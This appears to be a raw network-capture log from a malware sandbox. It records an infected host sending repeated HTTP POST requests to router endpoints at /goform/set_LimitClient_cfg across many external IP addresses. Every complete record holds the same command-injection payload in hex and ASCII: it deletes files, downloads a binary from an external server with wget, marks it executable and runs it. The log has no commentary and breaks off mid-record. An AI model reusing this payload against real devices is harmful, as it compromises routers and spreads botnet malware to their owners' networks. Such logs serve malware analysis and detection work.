                                                        May 28, 2024 08:59:08.438961029 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        944192.168.2.2344364188.149.159.1008080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.438987970 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        945192.168.2.235992496.16.227.1018080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.439040899 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        946192.168.2.235083048.209.173.1678080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.439073086 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        947192.168.2.2340542157.149.86.1928080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.439109087 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        948192.168.2.2355082134.87.254.1518080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.439127922 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        949192.168.2.235096474.187.208.668080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.439148903 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        950192.168.2.2340522105.241.18.578080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.439543009 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        951192.168.2.2336550164.138.28.1758080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.439558983 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        952192.168.2.2335066211.157.244.1148080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.439589977 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        953192.168.2.2356196147.145.176.2068080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.439608097 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        954192.168.2.2343622202.123.155.1848080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.439640045 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        955192.168.2.234420639.117.160.1588080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.439667940 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        956192.168.2.2354542216.245.189.2398080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.439692974 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        957192.168.2.235456675.55.241.2088080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.439704895 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        958192.168.2.2345236219.145.89.2368080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.439726114 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        959192.168.2.234772835.110.117.438080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.439749002 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        960192.168.2.2334404147.119.129.1898080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.439768076 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        961192.168.2.2356258133.13.193.308080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.439790010 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        962192.168.2.2347848187.28.153.328080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.439888954 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        963192.168.2.2336472154.66.93.2008080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.439913034 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        964192.168.2.235105072.20.33.898080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.439961910 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        965192.168.2.235332283.182.207.1178080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.440006971 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        966192.168.2.234679818.16.145.1968080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.440130949 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
